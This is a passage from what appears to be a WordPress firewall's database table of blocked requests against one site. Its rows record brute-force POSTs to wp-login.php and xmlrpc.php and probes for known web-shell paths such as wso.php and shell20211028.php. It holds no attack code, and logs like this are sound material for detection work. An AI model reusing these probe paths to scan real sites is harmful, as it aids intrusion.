Firefox\\/96\"}','uPD9FkXdyK3tcfNbZiUHEho4',0,1666168711.7971,18534,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','QFPRZmeygioCl50bXOJBafWs',0,1666167349.8339,18556,'','POST',403,0,515,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','ndJqUaOZ350Xxvyl6PwIgWKz',0,1666168526.5825,18792,'','POST',403,0,600,0,1,'',0),('167.71.106.216',2806475480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sPe4Qk0SZRiVWTKpU15A6Eou',0,1666166676.9884,18078,'','POST',403,0,515,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','CDmSxWbGUAIfYKi1ghpo2RMB',0,1666173129.9395,17442,'','POST',403,0,600,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lpPLVbGy4fi6Na18SwAFUK2I',0,1666172253.9633,18457,'','POST',403,0,515,0,1,'',0),('62.108.37.226',1047274978,'','http://cteisys.com/owa/auth/logon.aspx?replaceCurrent=1&url=http%3A%2F%2Fowa.cteisys.com%2Fowa%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','JaKe07qClr9cOPMEWpiIXHbD',0,1666171462.5772,291,'','GET',403,0,700,0,1,'',0),('62.108.37.226',1047274978,'','https://cteisys.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3A%2F%2Fowa.cteisys.com%2Fowa%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','G1KwTWb9ad2FJpVkXv8CtAcL',0,1666171449.0765,12960,'','GET',403,0,700,0,1,'',0),('192.227.155.193',3236142017,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','CfwiFgaJl2soAm65XEKtUjBh',0,1666170837.5996,1185,'','POST',403,0,600,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OYdnZPihTUEDzg93WS7l28FJ',0,1666170800.3323,19295,'','POST',403,0,515,0,1,'',0),('13.233.178.41',233419305,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xiO94Mc3jrnd5JZUobGswYAu',0,1666181556.4066,19874,'','POST',403,0,515,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','q4RJAOda1gnuQlt2bXY3BCcW',0,1666180588.9977,276,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','MqgtRw5i1vIdfGxZ3eKUXYJO',0,1666180584.7208,308,'','GET',403,0,700,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EBVjLUCmqytxW6diXnzQDlAv',0,1666176708.7562,8544,'','POST',403,0,515,0,1,'',0),('195.178.120.27',3283253275,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','jJrZw91t3R8GBvsMXlYkgbuN',0,1666177079.0495,1538,'','POST',403,0,515,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php?redirect_to=https://cteisys.com/wp-admin/','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko\\/20100101 Firefox\\/75.0\"}','p2VQ9rhU4csGq5oSuknZ8PCT',0,1666176141.7281,1372,'','POST',403,0,600,0,1,'',0),('95.81.81.219',1599164891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7s38Fcjny2o4GNqLV9mbEDSZ',0,1666175882.5643,19193,'','POST',403,0,515,0,1,'',0),('149.56.26.54',2503481910,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','uz9iNRjUKP36EqCSGge7MHFV',0,1666175378.5571,1320,'','POST',403,0,600,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2gLbHl3Zw8oejsWzqr91DON6',0,1666175110.5523,19216,'','POST',403,0,515,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CJ1QRUTYAF6Hwg4l8DbN2ju3',0,1666174397.4403,19112,'','POST',403,0,515,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','96C7OX5tQ2vrFSsIyMmlpehP',0,1666173687.1213,18544,'','POST',403,0,515,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','r4KFBMkpaWNsyAGEZiShdvP9',0,1666180579.5025,320,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','mRQ9YhCx8inOgBwdXZ50sjvM',0,1666180560.8922,11494,'','GET',403,0,700,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CliYWbU1k8voMmS4z3pZgqwF',0,1666180022.7693,19749,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','368DCYh5NQmlbZKaU0SIuM1G',0,1666179239.8863,20054,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wB26vioyafGENTFUsA1npQIH',0,1666178660.5719,386,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','iyrBfstG0O1FkoRLMuSb5QHz',0,1666178657.1180,448,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','tSBuda9fNbyLWXq2lG805vFP',0,1666178654.1537,392,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','35HKwPnpLsakXDcjyRQmVh6v',0,1666178640.2027,11591,'','GET',403,0,700,0,1,'',0),('14.225.255.250',249692154,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','yqUruTNMWOwAQgv5zdD9xn0s',0,1666177607.5338,2150,'','POST',403,0,600,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/wso.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','CamhIAGirW9EJvOf1oNRDzFP',0,1666177504.8371,434,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wso.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7dAYP8vjJzgGmkCt4L5Ucl1M',0,1666177500.8578,306,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/wp-content/uploads/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','IE5bX92FjQsGNZMJlkShq8KC',0,1666177498.2841,306,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/uploads/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','1Qpb0K8DPwcBHYyG3ALenM5Z',0,1666177489.3420,5436,'','GET',403,0,700,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','H2LMUrOYwIhm9f5N61yDTt7C',0,1666184249.3614,17841,'','POST',403,0,600,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MLmVNlTRgysWZSKw612if7F8',0,1666183132.7446,18780,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2eC0q3jYschVa4HES7oL6BAR',0,1666182362.2208,11755,'','POST',403,0,515,0,1,'',0),('141.95.104.232',2371840232,'','https://cteisys.com/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','n3NFflj8oxOLQD6EpZ4A0Xvc',0,1666182239.3077,277,'','GET',403,0,700,0,1,'',0),('141.95.104.232',2371840232,'','http://cteisys.com/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','REyZQlS2bhCOWv1wJ6e0qaUg',0,1666182233.6589,343,'','GET',403,0,700,0,1,'',0),('159.89.38.20',2673419796,'','https://cteisys.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','zls9eCScIVNZKd4pXkqDLOtA',0,1666187619.3575,286,'','GET',403,0,700,0,1,'',0),('159.89.38.20',2673419796,'','https://cteisys.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','lv0TcafHDECmFxV18YIGMJRL',0,1666187618.6685,301,'','GET',403,0,700,0,1,'',0),('159.89.38.20',2673419796,'','https://cteisys.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','o3PENdDYMxgqsUyuVXbCfwR0',0,1666187617.8245,318,'','GET',403,0,700,0,1,'',0),('159.89.38.20',2673419796,'','https://cteisys.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','9zefSbN14kcDOyj0tYFv6CGH',0,1666187617.0655,310,'','GET',403,0,700,0,1,'',0),('159.89.38.20',2673419796,'','https://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','AZxjLsFIYEHQv3p5mtic27JG',0,1666187602.6867,5023,'','POST',403,0,700,0,1,'',0),('159.89.38.20',2673419796,'','http://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ixG4V8FYhEqaloKIzQkjtW61',0,1666187593.9886,13718,'','POST',403,0,700,0,1,'',0),('167.71.216.37',2806503461,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EYku0AWnyVmdF9vxLlMh87aR',0,1666187199.6963,18315,'','POST',403,0,515,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','HSAJhfvbcEnOlUYQ8D2sPxaM',0,1666186520.8220,2362,'','POST',403,0,600,0,1,'',0),('146.59.243.31',2453402399,'','https://cteisys.com/wp-content/vuln.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','G7FRDwfiyEXMn8SkgmQClUau',0,1666185709.2711,660,'','GET',403,0,700,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-content/vuln.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','v2lkAu8EeNHFDZ9rVwPSIR0Q',0,1666185702.6937,329,'','GET',403,0,700,0,1,'',0),('146.59.243.31',2453402399,'','https://cteisys.com/wp-content/wso.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','2ujY0sdoDMBSCLpVnvZmUlFy',0,1666185695.1251,350,'','GET',403,0,700,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-content/wso.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','42p3PYB8Q5vcgIjsCeVybLzl',0,1666185674.7024,296,'','GET',403,0,700,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8CIX2bhg5TvFUMLsGzeKm7YP',0,1666185570.6036,18835,'','POST',403,0,515,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','hsoCE6nVPHcBpq7JQD4IawS1',0,1666191107.1492,2592,'','POST',403,0,600,0,1,'',0),('46.101.168.131',778414211,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fEWaQHpkwGvzIlML2DKYcArh',0,1666190615.2624,19454,'','POST',403,0,515,0,1,'',0),('47.115.24.165',796072101,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','sq1DpHB9QbdJ782ItLEr3Xoa',0,1666188809.1639,17532,'','POST',403,0,600,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8QJdr7jOKuAIp1BHXbg9LV34',0,1666188047.2218,9484,'','POST',403,0,515,0,1,'',0),('103.98.152.12',1734514700,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cJ6wYrRMHXtC3jkm7UahONA1',0,1666194957.9392,18843,'','POST',403,0,515,0,1,'',0),('161.35.68.167',2703443111,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YI37OrU0AJuQpNLkvSj1emVP',0,1666194088.8972,2525,'','POST',403,0,515,0,1,'',0),('8.142.173.121',143568249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','r17Gw9nYZRJUSB6ejFpT5Cvc',0,1666193404.9217,1602,'','POST',403,0,600,0,1,'',0),('23.88.103.173',391669677,'','https://cteisys.com/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xPRNpbXjW7Tak4otgOvndYZU',0,1666198323.2976,348,'','GET',403,0,700,0,1,'',0),('23.88.103.173',391669677,'','http://cteisys.com/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gFbvkJcV3SQtdnjw5iBOL2Go',0,1666198320.4768,398,'','GET',403,0,700,0,1,'',0),('23.88.103.173',391669677,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','cni5qBth7Lv4FKpUDa0yXQmS',0,1666198317.7247,607,'','GET',403,0,700,0,1,'',0),('23.88.103.173',391669677,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','exywEZO7PcQXph9fLUITRC8d',0,1666198314.9568,358,'','GET',403,0,700,0,1,'',0),('23.88.103.173',391669677,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FlRKPwtEr9xsyBVSG3nYLfCa',0,1666198310.8426,2007,'','GET',403,0,700,0,1,'',0),('23.88.103.173',391669677,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','AOug3cCGKl49J5vSwfZWEeXo',0,1666198297.7673,9394,'','GET',403,0,700,0,1,'',0),('8.142.173.121',143568249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','f8TqkVsMilz4hbAQErLZHdjt',0,1666198010.1503,2797,'','POST',403,0,600,0,1,'',0),('178.128.219.45',2994789165,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zIWm6Ld1NPZC5HAxMFgi7wkr',0,1666197808.1674,488,'','POST',403,0,600,0,1,'',0),('162.241.224.140',2733760652,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','W7PD1LsdUGe6yMwATZFbCon5',0,1666197001.2602,1507,'','POST',403,0,600,0,1,'',0),('108.167.189.26',1822932250,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pSELvoMQeWiJOUY3Rw1lnNsI',0,1666195768.7660,1765,'','POST',403,0,515,0,1,'',0),('43.251.133.57',737903929,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','a3xOk96oc0YKdjCu7TNWplJI',0,1666195715.7160,18223,'','POST',403,0,600,0,1,'',0),('103.111.30.40',1735335464,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sVScTBhv0xWIrgUdMpNXmCEf',0,1666201144.7274,18271,'','POST',403,0,515,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uqsNtrQv6b2TfCaGWJxR4H8n',0,1666200208.6729,2388,'','POST',403,0,515,0,1,'',0),('111.90.150.36',1868207652,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KEI9NtjSQVmsAFJgwa7TvGed',0,1666200680.3603,18945,'','POST',403,0,515,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NHuzCoUXa42b98DtcS61yRWn',0,1666199276.9783,19332,'','POST',403,0,515,0,1,'',0),('13.79.17.158',223285662,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','PX3TZwo8Vyqed7xnr6U9CblI',0,1666199911.3828,17555,'','POST',403,0,600,0,1,'',0),('108.179.192.195',1823719619,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qUZfydXLS4AaTzRNKmIWg5JF',0,1666198846.2293,18711,'','POST',403,0,515,0,1,'',0),('77.65.212.122',1296159866,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','d60MZNbPQ14Tqm3fxhFoORJW',0,1666205513.5663,17743,'','POST',403,0,600,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','Ii0KDdbmZJGseutLvTXjBV72',0,1666203667.0343,19182,'','POST',403,0,600,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 